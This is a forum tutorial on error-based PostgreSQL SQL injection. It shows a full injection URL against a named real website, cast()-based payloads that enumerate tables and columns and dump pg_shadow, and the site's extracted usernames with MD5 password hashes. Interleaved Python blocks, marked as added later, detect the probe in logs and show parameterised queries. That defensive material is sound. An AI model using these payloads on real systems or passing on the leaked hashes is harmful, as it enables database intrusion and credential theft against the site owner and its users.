Sheyken

PostgreSQL Injection Tutorial.


I would like to start my activity on RST with a topic that will bring "benefits" to the community, or to the users of this community.

Probably most of you know the easiest SQL injection methods [the main ones]:

MySQL Injection, Union Based or Blind, etc.

I thought I would write a tutorial for those who "would like" to advance in injections, and that is: a tutorial about PostgreSQL Injection.

---------------------------

As usual we take a site; I was in a hurry and picked a site [with the help of Google, via the dork -> inurl:.php? intext:Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: ]
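The dork above works because the application prints the raw pg_query() error to the page, and the whole technique that follows relies on that echoed error carrying the extracted value. From the defender's side, the same two artefacts (the cast()-based probe in the request and the "invalid input syntax for integer" error in the PHP log) are easy to detect. The following Python script is an added example, not code from the original post: it classifies log lines against those two signatures. The three sample lines are constructed (the IP address, paths and timestamps are invented for the demonstration); the error text matches both the pre-10 wording ("for integer") and the newer one ("for type integer").

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not from the original post): two web-server access-log
# requests and one PHP error-log line of the kind the post's Google dork matches.
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?p=290&p1=80 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?p=290&p1=-80%27+and+1%3Dcast%28%28select+table_name+from+information_schema.tables+limit+1+offset+0%29+as+int%29-- HTTP/1.1" 200 870',
    '[10-Oct-2023 13:55:41 UTC] PHP Warning:  pg_query(): Query failed: ERROR:  invalid input syntax for integer: "pg_type" in /var/www/index.php on line 42',
]

# The probe shape the post uses: a subquery forced through cast(... as int).
CAST_PROBE = re.compile(r"\bcast\s*\(.*\bas\s+int(eger)?\s*\)", re.IGNORECASE | re.DOTALL)
# Catalog objects the post enumerates; their presence in a request parameter is never legitimate.
CATALOG_REF = re.compile(r"\b(information_schema\.\w+|pg_shadow|pg_authid|pg_user|version\s*\(\s*\))",
                         re.IGNORECASE)
# The leaked value sits in quotes in the PostgreSQL error; older servers omit the word "type".
PG_INT_ERROR = re.compile(r'invalid input syntax for (?:type )?integer:\s*"([^"]*)"')


def classify(line):
    """Classify one log line. Returns (verdict, detail):
    ("error_leak", value)   - a DB error carrying an extracted value reached the log
    ("cast_probe", object)  - a request carrying the cast()-based enumeration probe
    ("clean", "")           - nothing matched
    The line is URL-decoded first so encoded payloads (%28, +) are inspected in clear."""
    decoded = unquote_plus(line)
    m = PG_INT_ERROR.search(decoded)
    if m:
        return ("error_leak", m.group(1))
    if CAST_PROBE.search(decoded):
        ref = CATALOG_REF.search(decoded)
        return ("cast_probe", ref.group(1) if ref else "unknown")
    return ("clean", "")


def scan(lines):
    """Return only the suspicious lines, as (line_no, verdict, detail) tuples."""
    hits = []
    for n, line in enumerate(lines, start=1):
        verdict, detail = classify(line)
        if verdict != "clean":
            hits.append((n, verdict, detail))
    return hits


if __name__ == "__main__":
    for n, verdict, detail in scan(SAMPLE_LINES):
        print(f"line {n}: {verdict} ({detail})")
```

An "error_leak" hit is the more urgent one: it means the database error text is being rendered into a response, which on a PHP deployment usually comes down to display_errors being enabled in production. Turning that off removes the channel the post uses but does not fix the injection itself.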

Ok, let's start the "practical" part:

[1] If we were to start from 0, we would look up the database version; to find the version the following query is needed:

and 1=cast(version() as int)--

In my case:

[screenshot: tutorial1zc.png]

[2] We continue by finding the tables in the database; to find the first table the following query is needed:

and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--

In my case:

[screenshot: tutorial2l.png]

The first table in the database is pg_type. To move on to the next table the following query is needed:

and 1=cast((select table_name from information_schema.tables where table_name not in ('TABEL') limit 1 offset 0) as int)--

In my case:

and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type') limit 1 offset 0) as int)--

The next table is: pg_attribute

We will continue the injection; I did it the short way and went to the table I was interested in [the one with users].

Full query:

http://www.aspem.org/indexa.php?p=290&p1=-80' and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type','pg_attribute','user_mapping_options','user_mappings','tables','triggered_update_columns','triggers','usage_privileges','view_column_usage','view_routine_usage','view_table_usage','views','data_type_privileges','element_types','_pg_foreign_data_wrappers','foreign_data_wrapper_options','foreign_data_wrappers','pg_statistic','_pg_foreign_servers','foreign_server_options','foreign_servers','_pg_user_mappings','schemata','sequences','sql_features','sql_implementation_info','sql_languages','sql_packages','pg_database','pg_authid','pg_roles') limit 1 offset 0) as int)--+

The users table is pg_shadow.

[3] We continue with extracting the columns from the pg_shadow table; the following query is needed:

and 1=cast((select column_name from information_schema.columns where table_name = 'pg_shadow' limit 1 offset 0) as int)--

In my case:

[screenshot: tutorial3fb.png]

First column: usename

To extract the next column, the following change to the query above is needed.

and 1=cast((select column_name from information_schema.columns where table_name = 'pg_shadow' limit 1 offset 1) as int)--

The 2nd column: usesysid

We skip... straight to the column we are interested in, the "passwd" column.

and 1=cast((select column_name from information_schema.columns where table_name = 'pg_shadow' limit 1 offset 5) as int)--

We have the columns we are interested in:

usename & passwd.

[4] Let's continue; we will need to extract the data from usename & passwd.

The following query is needed:

and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)--

First user:

[screenshot: tutorial3g.png]

2nd user: postgres

3rd user: salvataggi

The first password, for the user aspem:

You need the following query:

and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)--

[screenshot: tutorial5e.png]

I will skip the part with the rest of the screenshots [because you can manage on your own, "you're big boys" ;)) ]

All users & passwords:

User: aspem

Password: 4e8991501921aa20346da7d0ea86fe35 [MD5]

User: postgres

Password: 142484a40d02122af06bc427d4367d73 [MD5]

User: salvataggi

Password: No password.
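Two things made steps [1] through [4] possible: the p1 parameter is spliced straight into the SQL text inside quotes, and the database error is echoed back. A third point worth noting for anyone auditing such an application: pg_shadow is readable only by superusers, so the application was connecting to PostgreSQL as a superuser, which is why password hashes were reachable at all. The Python below is an added example, not code from the original post or from the affected site: it contrasts the vulnerable query construction with a hardened one (type validation plus a bound parameter, the equivalent of pg_query_params() in PHP) and shows error handling that logs the real error server-side while returning a generic message. The table and column names (pages, id, title, body) and the sample p1 values are assumptions made for the demonstration.

```python
import logging
import re

log = logging.getLogger("app.db")

# Constructed inputs for the demonstration (not from the original post): a normal
# value for the p1 parameter, and a payload of the shape the post uses.
NORMAL_P1 = "80"
INJECTED_P1 = "-80' and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)--"

# Assumed table and column names; the page only shows the URL parameters p and p1.
LOOKUP_SQL_PARAM = "SELECT title, body FROM pages WHERE id = $1"


def build_query_unsafe(p1):
    """Vulnerable pattern: the request parameter is spliced into the SQL text.
    This is the Python equivalent of pg_query("... WHERE id = '$p1'") in PHP."""
    return "SELECT title, body FROM pages WHERE id = '" + p1 + "'"


def build_query_safe(p1):
    """Hardened pattern: enforce the expected type, then hand the value over as a
    bound parameter so it can never become part of the SQL text (pg_query_params
    in PHP, cursor.execute(sql, params) in psycopg2). Returns (sql, params)."""
    if not re.fullmatch(r"\s*-?\d{1,10}\s*", p1):
        raise ValueError("p1 must be an integer")
    return LOOKUP_SQL_PARAM, (int(p1),)


def touches_catalog(sql):
    """True if the SQL text that would reach PostgreSQL references a system catalog,
    i.e. attacker-controlled text has become part of the query."""
    return re.search(r"\b(pg_shadow|pg_authid|information_schema)\b", sql, re.IGNORECASE) is not None


def render_db_error(exc, debug=False):
    """Log the real driver error server-side and return only a generic message to
    the client. The post's technique depends on the cast() error text being shown
    on the page; withholding it closes that channel (it does not fix the injection)."""
    log.error("database error: %s", exc)
    return str(exc) if debug else "An internal error occurred."


def demo():
    """Run both builders against the constructed inputs and summarise the outcome."""
    unsafe = build_query_unsafe(INJECTED_P1)
    try:
        build_query_safe(INJECTED_P1)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "unsafe_touches_catalog": touches_catalog(unsafe),
        "safe_rejected": rejected,
        "safe_normal": build_query_safe(NORMAL_P1),
    }


if __name__ == "__main__":
    print(demo())
```

The validation regex is a first line of defence only; the bound parameter is what actually prevents the value from being parsed as SQL, and it should be used even for parameters that pass validation. Running the application's database role without superuser rights (so that pg_shadow and pg_authid are not readable) limits what an injection that does get through can reach.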

----------------------------

Thank you for "wasting" your time on this tutorial which perhaps [you already knew].

Edited by Sheyken